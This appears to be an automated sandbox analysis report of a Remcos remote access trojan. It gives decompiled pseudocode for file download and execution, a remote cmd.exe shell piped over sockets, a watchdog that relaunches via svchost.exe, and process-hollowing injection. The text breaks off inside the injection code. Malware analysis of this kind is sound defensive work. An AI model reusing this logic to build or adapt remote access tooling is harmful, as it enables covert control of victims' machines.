					_t294 = E00401E25( &_v300, _t539, _t580, _t638, 2);
					E00402ED0(0, _t617, E00402ED0(0,  &_v224, E00402ED0(0,  &_v248, E00402EF1( &_v296, E00401E25( &_v304, _t539, _t580, _t638, 1), _t580, 0x46e260), _t580, _t638, _t294), _t580, _t638, 0x46e260), _t580, _t638, _t293);
					_push(0x56);
					E00404A78( &_v152, _t298, _t638);
					E00401F98();
					E00401F98();
					E00401F98();
					E0040413E(0,  &_v280, _t298, _t580, E00401F6B(E00401E25( &_v336, _t298, _t580, _t638, 0)));
					_t307 = E004183E5( &_v260,  &_v284);
					_t618 = _t617 - 0x18;
					_t553 = "Downloading file: ";
					E004052D4(0, _t618, _t553, _t580, _t638, _t307);
					_t619 = _t618 - 0x14;
					_t579 = "i";
					E00402053(0, _t619, _t553, _t580, "i");
					E00417D02(0, 0x46e260);
					E00401F98();
					E00401EC9();
					_t314 = E00401F6B(E00401E25( &_v348, _t553, _t580, _t638, 0));
					_t621 = _t619 + 0x30 - 0x18;
					E0040413E(0, _t621, _t553, _t580, _t314);
					_t318 = E00438A30(_t316, E00401F6B(E00401E25( &_v356, _t553, _t580, _t638, 4)), 0, 0xa);
					_push(_t553);
					_push(_t318);
					_t319 = E00406335( &_v204, _t638);
					_t623 = _t621 + 0x2c;
					_push(0);
					_t639 = _t319;
					if(_t319 == 0) {
						E0040413E(0,  &_v252, _t553, _t580, E00401F6B(E00401E25( &_v360, _t553, _t580, __eflags)));
						_t323 = E004183E5( &_v232,  &_v256);
						_t539 = "Failed to download file: ";
						E004052D4(0, _t623 - 0x18, "Failed to download file: ", _t580, __eflags, _t323);
						E00402053(0, _t623 - 4, "Failed to download file: ", _t580, "E");
						E00417D02(0, 0x46e260);
						E00401F98();
						E00401EC9();
					} else {
						E0040413E(0,  &_v252, _t553, _t580, E00401F6B(E00401E25( &_v360, _t553, _t580, _t639)));
						_t334 = E004183E5( &_v232,  &_v256);
						_t539 = "Downloaded file: ";
						E004052D4(0, _t623 - 0x18, "Downloaded file: ", _t580, _t639, _t334);
						E00402053(0, _t623 - 4, "Downloaded file: ", _t580, "i");
						E00417D02(0, 0x46e260);
						E00401F98();
						E00401EC9();
						E00402053(0, _t623 - 4 + 0x30 - 0x18, "Downloaded file: ", _t580, 0x461084);
						_push(0x58);
						E00404A78( &_v168, "Downloaded file: ", _t639);
					}
					E00404DFD(_t539);
					E00404EB9(0,  &_v152, _t539, _t579);
					goto L16;
				}
			}

0x00406571
0x00406571
0x00406581
0x00406583
0x0040658b
0x00406593
0x004065ad
0x004065b7
0x004065bc
0x004065c7
0x004065cc
0x004065d9
0x004065e2
0x004065ec
0x004065ef
0x004065f1
0x00406c32
0x00406c32
0x00406c38
0x00406dd7
0x00406df3
0x00406e0f
0x00406e29
0x00406e39
0x00406e48
0x00406e4a
0x00406e4f
0x00406e4f
0x00406e52
0x00406e8c
0x00406e90
0x00406e96
0x00406e9d
0x00406ea6
0x00406e54
0x00406e57
0x00406e62
0x00406e68
0x00406e6d
0x00406eaf
0x00406eb4
0x00406eb8
0x00406ebd
0x00406ec1
0x00406ec6
0x00406eca
0x00406ed6
0x00406edf
0x00406eec
0x00406eec
0x00406c3e
0x00406c3e
0x00406c41
0x00406d62
0x00406d75
0x00406d7b
0x00406d91
0x00406d9b
0x00406da6
0x00406db5
0x00406c25
0x00406c25
0x00000000
0x00406c2a
0x00406c47
0x00406c47
0x00406c4a
0x00406d22
0x00406d3c
0x00406d40
0x00406c50
0x00406c50
0x00406c50
0x00406c53
0x00406c72
0x00406c78
0x00406c7d
0x00406c83
0x00406c88
0x00406c92
0x00406ca3
0x00406ca8
0x00406cae
0x00406cb9
0x00406cc7
0x00406ccc
0x00406ccf
0x00406cd5
0x00406ce0
0x00406cf6
0x00406cfb
0x00406d05
0x00406d05
0x00406c55
0x00406c55
0x00406c58
0x00406c5e
0x00406c5e
0x00406c58
0x00406c53
0x00000000
0x00406c4a
0x004065f7
0x00406afd
0x00406b0c
0x00406b16
0x00406b18
0x00406b2e
0x00406b1a
0x00406b21
0x00406b21
0x00406b34
0x00406b3d
0x00406b3f
0x00406b66
0x00406b6b
0x00406b70
0x00406b77
0x00406b84
0x00406b89
0x00406b8c
0x00406b94
0x00406b99
0x00406b9c
0x00406b9e
0x00406b41
0x00406b45
0x00406b4a
0x00406b4d
0x00406b55
0x00406b5a
0x00406b5d
0x00406b5f
0x00406b5f
0x00406ba3
0x00406ba8
0x00406bad
0x00406bb4
0x00406bbf
0x00406bc4
0x00406bc9
0x00406bcb
0x00406bd0
0x00406bd2
0x00000000
0x00406bd8
0x00406be3
0x00406be9
0x00406bee
0x00406bf0
0x00406c03
0x00406c0c
0x00406c20
0x00000000
0x00406c20
0x00406bd2
0x004065fd
0x00406600
0x00406ab8
0x00406ac3
0x00406ad0
0x00406ad5
0x00406ad9
0x00000000
0x00406ade
0x00406606
0x00406609
0x00406a0a
0x00406a1e
0x00406a35
0x00406a3b
0x00406a4a
0x00406a53
0x00406a6a
0x00406a6e
0x00406a74
0x00406a7b
0x00406a84
0x00406a8d
0x00406a96
0x00406a96
0x00000000
0x00406a96
0x0040660f
0x00406612
0x00406988
0x00406997
0x0040699c
0x004069c6
0x004069ce
0x004069d6
0x004069e5
0x004069ea
0x004069f6
0x00000000
0x004069f6
0x00406618
0x0040661b
0x0040690f
0x00406928
0x00406936
0x0040693e
0x00406946
0x00406955
0x0040695a
0x00406966
0x00000000
0x00406966
0x00406621
0x00406624
0x00406895
0x004068a6
0x004068b5
0x004068d1
0x004068dc
0x004068ea
0x00000000
0x004068ef
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00406633
0x00406639
0x0040663f
0x0040664d
0x0040665a
0x00406665
0x0040666a
0x00406677
0x004066b4
0x004066ba
0x004066c3
0x004066cc
0x004066d5
0x004066de
0x004066f9
0x00406706
0x0040670b
0x0040670e
0x00406716
0x0040671b
0x0040671e
0x00406726
0x0040672b
0x00406737
0x00406740
0x00406751
0x00406756
0x0040675c
0x00406777
0x00406786
0x00406787
0x00406788
0x0040678d
0x00406794
0x00406795
0x00406797
0x00406821
0x0040682e
0x00406836
0x0040683e
0x0040684d
0x00406852
0x0040685e
0x00406867
0x00406799
0x004067aa
0x004067b7
0x004067bf
0x004067c7
0x004067d2
0x004067d7
0x004067e3
0x004067ec
0x004067fb
0x00406800
0x00406809
0x00406809
0x00406873
0x0040687f
0x00000000
0x00406884

APIs

SetEvent.KERNEL32(?,?), ref: 00406593
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406928

Part of subcall function 0040489F: connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C

Part of subcall function 00406335: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,0046E260,00460F88,?,00000000,0040678D,00000000), ref: 00406397
Part of subcall function 00406335: WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 004063DF
Part of subcall function 00406335: CloseHandle.KERNEL32(00000000,?,00000000,0040678D,00000000,?,?,0000000A,00000000), ref: 0040641F
Part of subcall function 00406335: MoveFileW.KERNEL32(00000000,00000000), ref: 0040643C

GetLogicalDriveStringsA.KERNEL32 ref: 00406A0A
GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406B0C
DeleteFileW.KERNEL32(00000000), ref: 00406B2E
StrToIntA.SHLWAPI(00000000,00000000), ref: 00406D22

Part of subcall function 00418F13: SystemParametersInfoW.USER32 ref: 00419008

Sleep.KERNEL32(000007D0), ref: 00406CE0

Part of subcall function 00404A78: WaitForSingleObject.KERNEL32(00000000,00000000,TT@s,?,?,00000004,?,?,00000004,?,0046E278,R@), ref: 00404B1E
Part of subcall function 00404A78: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,0046E278,R@,?,?,?,?,?,00405454), ref: 00404B4C

Strings

Downloaded file: , xrefs: 004067BF
Browsing directory: , xrefs: 004069CE
Unable to delete: , xrefs: 00406B8C
Unable to rename file!, xrefs: 00406E7B
Downloading file: , xrefs: 0040670E
open, xrefs: 00406922
Failed to download file: , xrefs: 00406836
Deleted file: , xrefs: 00406B4D
Executing file: , xrefs: 0040693E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$Event$AttributesCloseCreateDeleteDriveExecuteHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWriteconnectsend
String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
API String ID: 2160989192-1507758755
Opcode ID: df5979ebcb57634c07c850389a01030b96332b33cf773dd07da2beca838ed320
Instruction ID: 8841d6d8737b4348805b15b28e4d29613fed3da607a04bb90e6be04e50a28c43
Opcode Fuzzy Hash: df5979ebcb57634c07c850389a01030b96332b33cf773dd07da2beca838ed320
Instruction Fuzzy Hash: 3A229071A083005BC614FB76C9679AF77A8AF91308F40093FF542671E2EE7C9949869B

Uniqueness

Uniqueness Score: -1.00%

Function 00405671 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405671() {
				char _v4;
				void* _v16;
				char _v28;
				char _v52;
				long _v56;
				long _v60;
				CHAR* _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				CHAR* _v84;
				long _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				CHAR* _t97;
				void* _t105;
				intOrPtr _t135;
				signed int _t138;
				signed int _t139;
				long _t141;
				char* _t143;
				void* _t149;
				void* _t155;
				void* _t161;
				void* _t168;

				_t149 =  &_v68;
				_t135 =  *((intOrPtr*)( *[fs:0x2c]));
				_t139 = _t138 | 0xffffffff;
				_t97 = 0;
				if( *0x46ff48 >  *((intOrPtr*)(_t135 + 4))) {
					E00430D17(0x46ff48);
					_t152 =  *0x46ff48 - _t139;
					if( *0x46ff48 == _t139) {
						E004046B7(0x46fea8, 0x46ff48, 0);
						E004310BE(_t152, E00453D07);
						E00430CD8(_t139, 0x46ff48);
					}
				}
				if( *0x46ff28 >  *((intOrPtr*)(_t135 + 4))) {
					E00430D17(0x46ff28);
					_t154 =  *0x46ff28 - _t139;
					if( *0x46ff28 == _t139) {
						E0040209F(_t97, 0x46ff50);
						E004310BE(_t154, E00453CFD);
						E00430CD8(_t139, 0x46ff28);
					}
				}
				_t98 =  &_v52;
				E0040209F(_t97,  &_v52);
				_t143 = 0x46e310;
				_t136 = CloseHandle;
				_v64 = _t97;
				_t155 =  *0x46dad6 - _t97; // 0x0
				if(_t155 != 0) {
					L12:
					_v60 = _t97;
					PeekNamedPipe( *0x46ff30, _t97, _t97, _t97,  &_v60, _t97);
					if(_v60 <= _t97) {
						_t149 = _t149 - 0x18;
						E00402053(_t97, _t149, _t134, _t143, 0x461084);
						_push(0x62);
						_t139 = E00404A78(0x46fea8, _t134, __eflags);
						goto L21;
					}
					_push(_v60);
					_t56 = E00438691(_t98);
					_t144 = _t56;
					ReadFile( *0x46ff30, _t56, _v60,  &_v56, _t97);
					if(_v56 <= _t97) {
						L19:
						L0043868C(_t144);
						_t143 = 0x46e310;
						goto L21;
					}
					if(_v64 <= _t97) {
						L17:
						E00402053(_t97,  &_v28, _t134, _t144, _t144);
						_t149 = _t149 - 0x18;
						_t105 = _t149;
						_push(_v60);
						_push(_t97);
						L18:
						E00405A82(_t97, _t105, _t134, _t144, _t165);
						_t139 = E00404A78(0x46fea8, _t134, _t165, 0x62,  &_v28);
						E00401F98();
						goto L19;
					}
					_t66 = E004386A0(_t144, E00401F6B( &_v52), _v64);
					_t149 = _t149 + 0xc;
					_t165 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402053(_t97,  &_v28, _t134, _t144, _t144);
					_t149 = _t149 - 0x18;
					_t105 = _t149;
					_push(_v60 - _v68);
					_push(_v68);
					goto L18;
				} else {
					_t134 = "cmd.exe";
					_t98 = 0x46e310;
					_t70 = E00405ADC("cmd.exe");
					_t156 = _t70;
					if(_t70 == 0) {
						L11:
						_t161 =  *0x46dad6 - _t97; // 0x0
						if(_t161 == 0) {
							L26:
							E00404DFD(_t134);
							CloseHandle( *0x46ff30);
							CloseHandle( *0x46ff4c);
							 *0x46dad6 = _t97;
							_t97 = 1;
							L27:
							E00401F98();
							E00401F98();
							return _t97;
						} else {
							goto L12;
						}
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
							_t98 = _t143;
							 *0x46dad7 =  <=  ? 0 :  *0x46dad7 & 0x000000ff;
							if(E0040243C() == 0) {
								_v84 = _t97;
							} else {
								L00405354(_t97, _t143, _t134, _t136, _t143, "\n");
								E00401F80( &_v76, _t143);
								_t52 = E0040243C();
								WriteFile( *0x46ff2c, E00401F6B(_t143), _t52,  &_v92, _t97);
								_t98 = _t143;
								L00405A7D(_t97, _t143, _t134, 0x461084);
							}
							Sleep(0x64);
							_t168 =  *0x46dad7 - _t97; // 0x0
						} while (_t168 != 0);
						TerminateProcess(0x46ff34->hProcess, _t97);
						CloseHandle( *0x46ff38);
						CloseHandle( *0x46ff34);
						goto L26;
					}
					L00405A7D(_t97, 0x46ff50, "cmd.exe", E00438A1A(_t97, _t156, "SystemDrive"));
					L00405354(_t97, 0x46ff50, "cmd.exe", CloseHandle, 0x46ff50, "\\");
					0x46fe50->nLength = 0xc;
					 *0x46fe58 = 1;
					 *0x46fe54 = _t97;
					if(CreatePipe(0x46ff44, 0x46ff2c, 0x46fe50, _t97) == 0 || CreatePipe(0x46ff30, 0x46ff4c, 0x46fe50, _t97) == 0) {
						goto L27;
					} else {
						_t141 = 0x44;
						E004337A0(CloseHandle, 0x46fe60, _t97, CreatePipe);
						0x46fe60->cb = _t141;
						 *0x46fe8c = 0x101;
						 *0x46fe90 = 0;
						 *0x46fe98 =  *0x46ff44;
						_t79 =  *0x46ff4c;
						 *0x46fe9c = _t79;
						 *0x46fea0 = _t79;
						_t80 = E00401F6B(0x46ff50);
						_t143 = 0x46e310;
						 *0x46dad6 = CreateProcessA(_t97, E00401F6B(0x46e310), _t97, _t97, 1, _t97, _t97, _t80, 0x46fe60, 0x46ff34) != 0;
						L00405A7D(_t97, 0x46e310, _t134, 0x461084);
						 *0x46dad7 = 1;
						E00404804(0x46fea8);
						E0040489F(0x46fea8, 0x46fea8, 0x46fea8);
						_t149 = _t149 + 0xc - 0x18;
						E004020B6(_t97, _t149, _t134,  *0x46dad6,  &_v4);
						_push(0x93);
						_t98 = 0x46fea8;
						_t139 = E00404A78(0x46fea8, _t134,  *0x46dad6);
						Sleep(0x12c);
						goto L11;
					}
				}
			}

0x00405677
0x0040567e
0x00405680
0x00405688
0x00405690
0x00405698
0x0040569e
0x004056a4
0x004056ac
0x004056b6
0x004056bd
0x004056c2
0x004056a4
0x004056ce
0x004056d6
0x004056dc
0x004056e2
0x004056e9
0x004056f3
0x004056fa
0x004056ff
0x004056e2
0x00405700
0x00405704
0x00405709
0x0040570e
0x00405714
0x00405718
0x0040571e
0x00405880
0x00405885
0x00405893
0x0040589d
0x0040594e
0x00405958
0x0040595d
0x00405969
0x00000000
0x00405969
0x004058a3
0x004058a7
0x004058ae
0x004058c0
0x004058ca
0x00405940
0x00405941
0x00405947
0x00000000
0x00405947
0x004058d0
0x0040590b
0x00405910
0x00405915
0x00405918
0x0040591a
0x0040591e
0x0040591f
0x00405924
0x00405939
0x0040593b
0x00000000
0x0040593b
0x004058e1
0x004058e6
0x004058e9
0x004058eb
0x00000000
0x00000000
0x004058f2
0x004058ff
0x00405902
0x00405904
0x00405905
0x00000000
0x00405724
0x00405724
0x00405729
0x0040572b
0x00405730
0x00405732
0x00405874
0x00405874
0x0040587a
0x00405a04
0x00405a09
0x00405a14
0x00405a1c
0x00405a1e
0x00405a24
0x00405a26
0x00405a2a
0x00405a33
0x00405a41
0x00000000
0x00000000
0x00000000
0x00405880
0x00000000
0x0040596b
0x00405976
0x00405979
0x0040597b
0x00405987
0x004059cf
0x00405989
0x00405990
0x0040599a
0x004059a7
0x004059bb
0x004059c6
0x004059c8
0x004059c8
0x004059d5
0x004059db
0x004059db
0x004059ee
0x004059fa
0x00405a02
0x00000000
0x00405a02
0x0040574b
0x00405757
0x00405773
0x0040577d
0x00405787
0x00405791
0x00000000
0x004057ad
0x004057af
0x004057b8
0x004057c0
0x004057c8
0x004057d2
0x004057e7
0x004057ec
0x004057f2
0x004057f7
0x004057fc
0x00405807
0x00405825
0x0040582c
0x00405836
0x0040583f
0x00405847
0x0040584c
0x00405856
0x0040585b
0x00405860
0x0040586c
0x0040586e
0x00000000
0x0040586e
0x00405791

APIs

__Init_thread_footer.LIBCMT ref: 004056BD

Part of subcall function 00404A78: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B0D

__Init_thread_footer.LIBCMT ref: 004056FA
CreatePipe.KERNEL32(0046FF44,0046FF2C,0046FE50,00000000,0046109C,00000000), ref: 0040578D
CreatePipe.KERNEL32(0046FF30,0046FF4C,0046FE50,00000000), ref: 004057A3
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046FE60,0046FF34), ref: 00405816
Sleep.KERNEL32(0000012C,00000093,?), ref: 0040586E
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405893
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C0

Part of subcall function 004310BE: __onexit.LIBCMT ref: 004310C4

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046E310,004610A0,00000062,00461084), ref: 004059BB
Sleep.KERNEL32(00000064,00000062,00461084), ref: 004059D5
TerminateProcess.KERNEL32(00000000), ref: 004059EE
CloseHandle.KERNEL32 ref: 004059FA
CloseHandle.KERNEL32 ref: 00405A02
CloseHandle.KERNEL32 ref: 00405A14
CloseHandle.KERNEL32 ref: 00405A1C

Strings

SystemDrive, xrefs: 00405738
cmd.exe, xrefs: 00405724

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: a00e173401327d9a7b09bbfe1053553a7d021985a97f3a056504690394dec93a
Instruction ID: cb4e1e58c913fca3d6a1af9edfb165cf85d8e051cbecda12000959ddded38d9f
Opcode Fuzzy Hash: a00e173401327d9a7b09bbfe1053553a7d021985a97f3a056504690394dec93a
Instruction Fuzzy Hash: AA91C671608344AFC704BB65EC41A2F3AA9EB45358F40043FF585A62E3EBBD5C488B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC77 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040FC77(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t45;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				void* _t147;
				signed int _t148;
				void* _t150;
				void* _t156;

				_t150 = (_t148 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				_t131 = E00401F6B(0x46e5a0);
				if(E00410DEB(0x46e5a0, _t27, "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E0040209F(0x46e5a0,  &_v100);
						E00401EC4(0x46e588);
						E004189A5( &_v100);
						E00401F46(0x46e5a0,  &_v124);
						__eflags = E004186B9( &_v124);
						if(__eflags != 0) {
							_t35 = E0040413E(0x46e5a0,  &_v76,  &_v100, _t147, L"\\SysWOW64");
							E00401ED3( &_v132, _t37, _t142, E00402F65( &_v36, E0040413E(0x46e5a0,  &_v56,  &_v100, _t147, E00438A0F(0x46e5a0,  &_v76, __eflags, L"WinDir")), _t35));
							E00401EC9();
							E00401EC9();
						} else {
							_t61 = E0040413E(0x46e5a0,  &_v28,  &_v100, _t147, L"\\system32");
							E00401ED3( &_v132, _t63, _t142, E00402F65( &_v84, E0040413E(0x46e5a0,  &_v56,  &_v100, _t147, E00438A0F(0x46e5a0,  &_v28, __eflags, L"WinDir")), _t61));
							E00401EC9();
							E00401EC9();
						}
						E00401EC9();
						L00407735(0x46e5a0,  &_v124, 0, _t147, L"\\svchost.exe");
						_push(0x46dd44);
						_t143 = E00401F6B( &_v104);
						_t45 = E00401EC4( &_v128);
						_t134 = _t143;
						_t46 = E00414EA8(_t45, _t143);
						_t151 = _t150 - 0x18;
						_t107 = _t150 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402053(0x46e5a0, _t107, _t134, _t147, "Watchdog module activated");
							E00402053(0x46e5a0, _t151 - 0x18, _t134, _t147, "i");
							E00417D02(0x46e5a0, 0);
							Sleep(0x7d0);
							_t112 =  *0x46dd4c; // 0x0
							goto L13;
						}
						E00402053(0x46e5a0, _t107, _t134, _t147, "Watchdog launch failed!");
						E00402053(0x46e5a0, _t151 - 0x18, _t134, _t147, "E");
						E00417D02(0x46e5a0, 0);
						CloseHandle( *0x46dd54);
						E00401EC9();
						E00401F98();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t156 = _t150 - 0x18;
						E00402053(0x46e5a0, _t156, _t131, _t147, "Remcos restarted by watchdog!");
						_t157 = _t156 - 0x18;
						E00402053(0x46e5a0, _t156 - 0x18, _t131, _t147, "i");
						E00417D02(0x46e5a0, 0);
						E00402053(0x46e5a0, _t157 + 0x18, _t131, _t147, "Watchdog module activated");
						E00402053(0x46e5a0, _t157 + 0x18 - 0x18, _t131, _t147, "i");
						E00417D02(0x46e5a0, 0);
						CreateThread(0, 0, E004102A8, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410AC0(E00401F6B(0x46e5a0), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46dd44 = OpenProcess(0x1fffff, 0, _v132);
							E00410F1D(E00401F6B(0x46e5a0), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46dd03;
							if(__eflags != 0) {
								E0040FC77(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040fc7d
0x0040fc81
0x0040fc83
0x0040fc9b
0x0040fca6
0x0040fcbd
0x0040fcc3
0x0040fcc5
0x0040fd54
0x0040fd5e
0x0040fd69
0x0040fd72
0x0040fd7c
0x0040fd7e
0x0040fddb
0x0040fe07
0x0040fe10
0x0040fe19
0x0040fd80
0x0040fd89
0x0040fdb5
0x0040fdbe
0x0040fdc7
0x0040fdcc
0x0040fe22
0x0040fe30
0x0040fe35
0x0040fe47
0x0040fe49
0x0040fe4e
0x0040fe52
0x0040fe58
0x0040fe5b
0x0040fe5d
0x0040fe5f
0x0040fe66
0x0040fe75
0x0040fe7a
0x0040fe87
0x0040fe8d
0x00000000
0x0040fe8d
0x0040fe9a
0x0040fea9
0x0040feae
0x0040febc
0x0040fec6
0x0040fecf
0x0040fed4
0x0040fed6
0x0040fccb
0x0040fccc
0x0040fcd2
0x0040fcdc
0x0040fce1
0x0040fcec
0x0040fcf1
0x0040fd00
0x0040fd0b
0x0040fd10
0x0040fd22
0x0040fd2c
0x0040fd3c
0x0040fd43
0x0040fd45
0x00000000
0x0040fd4b
0x0040fef3
0x0040feff
0x0040ff05
0x0040ff09
0x0040ff09
0x0040ff0e
0x0040ff0f
0x0040ff10
0x0040ff11
0x0040ff13
0x0040ff21
0x0040ff26
0x0040ff2d
0x0040ff33
0x0040ff3a
0x0040ff3e
0x0040ff3e
0x00000000
0x0040ff3a
0x00000000
0x0040fd45
0x0040fca8
0x0040fca8
0x0040fcaa
0x0040fedd
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040FC83

Part of subcall function 00410DEB: RegCreateKeyA.ADVAPI32(80000001,00000000,00461084), ref: 00410DF9
Part of subcall function 00410DEB: RegSetValueExA.ADVAPI32(00461084,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A7DD,004618C8,00000001,000000AF,00461084), ref: 00410E14
Part of subcall function 00410DEB: RegCloseKey.ADVAPI32(00461084,?,?,?,0040A7DD,004618C8,00000001,000000AF,00461084), ref: 00410E1F

OpenMutexA.KERNEL32 ref: 0040FCBD
CloseHandle.KERNEL32(00000000), ref: 0040FCCC
CreateThread.KERNEL32 ref: 0040FD22
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040FEEA

Strings

WinDir, xrefs: 0040FD8F, 0040FDE1
Remcos restarted by watchdog!, xrefs: 0040FCD7
\SysWOW64, xrefs: 0040FDD2
\svchost.exe, xrefs: 0040FE27
Cv, xrefs: 0040FD22
Mutex_RemWatchdog, xrefs: 0040FCB0
Watchdog launch failed!, xrefs: 0040FE95
\system32, xrefs: 0040FD80
WDH, xrefs: 0040FD2C, 0040FD32, 0040FEF0
Watchdog module activated, xrefs: 0040FCFB, 0040FE61

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64$\svchost.exe$\system32$Cv
API String ID: 3018269243-672988995
Opcode ID: 0bdc7e049419541851ac9c92356915c154aa8d5cc9c3eed3cfb920c1897f8c48
Instruction ID: f5960626a988e2347c46ea91306854afa0d7950ddeed5a23268a862b91c02d91
Opcode Fuzzy Hash: 0bdc7e049419541851ac9c92356915c154aa8d5cc9c3eed3cfb920c1897f8c48
Instruction Fuzzy Hash: 8D51F2316083015BC214BB72DC0B8AF37A49E91719F50053FF502761E2FEBC994A86AF

Uniqueness

Uniqueness Score: -1.00%

Function 00414EA8 Relevance: 27.2, APIs: 18, Instructions: 181
memoryprocessnativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414EA8(WCHAR* __ecx, void* __edx) {
				void* __edi;
				void* _t47;
				void** _t67;
				void* _t68;
				int _t78;
				void* _t88;
				void* _t90;
				void* _t91;
				signed int _t95;
				void _t97;
				intOrPtr* _t101;
				struct _PROCESS_INFORMATION* _t105;
				WCHAR* _t106;
				CONTEXT* _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t88 = __edx;
				_t106 = __ecx;
				 *((intOrPtr*)(_t110 + 0xc)) = 0;
				if( *((intOrPtr*)(__edx)) == 0x5a4d) {
					_t101 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t101 != 0x4550) {
						L21:
						_t47 = 0;
						L22:
						return _t47;
					}
					E004337A0(_t101, _t110 + 0x28, 0, 0x44);
					_t105 =  *(_t110 + 0x80);
					E004337A0(_t101, _t105, 0, 0x10);
					_t111 = _t110 + 0x18;
					if(CreateProcessW(0, _t106, 0, 0, 0, 4, 0, 0, _t111 + 0x24, _t105) == 0) {
						goto L21;
					}
					CloseHandle( *(_t111 + 0x5c));
					CloseHandle( *(_t111 + 0x60));
					CloseHandle( *(_t111 + 0x64));
					_t108 = VirtualAlloc(0, 4, 0x1000, 4);
					 *(_t111 + 0x24) = _t108;
					_t108->ContextFlags = 0x10007;
					if(GetThreadContext(_t105->hThread, _t108) == 0 || ReadProcessMemory(_t105->hProcess, _t108->Ebx + 8, _t111 + 0x18, 4, 0) == 0) {
						L20:
						TerminateProcess(_t105->hProcess, 0);
						CloseHandle(_t105->hProcess);
						CloseHandle(_t105->hThread);
						E004337A0(CloseHandle, _t105, 0, 0x10);
						goto L21;
					} else {
						_t90 =  *(_t111 + 0x10);
						_t67 = _t101 + 0x34;
						if(_t90 ==  *_t67) {
							NtUnmapViewOfSection(_t105->hProcess, _t90);
							_t67 = _t101 + 0x34;
						}
						_t68 = VirtualAllocEx(_t105->hProcess,  *_t67,  *(_t101 + 0x50), 0x3000, 0x40);
						 *(_t111 + 0x1c) = _t68;
						if(_t68 == 0 || WriteProcessMemory(_t105->hProcess, _t68, _t88,  *(_t101 + 0x54), 0) == 0) {
							goto L20;
						} else {
							 *(_t111 + 0x14) =  *(_t111 + 0x14) & 0x00000000;
							if(0 >=  *(_t101 + 6)) {
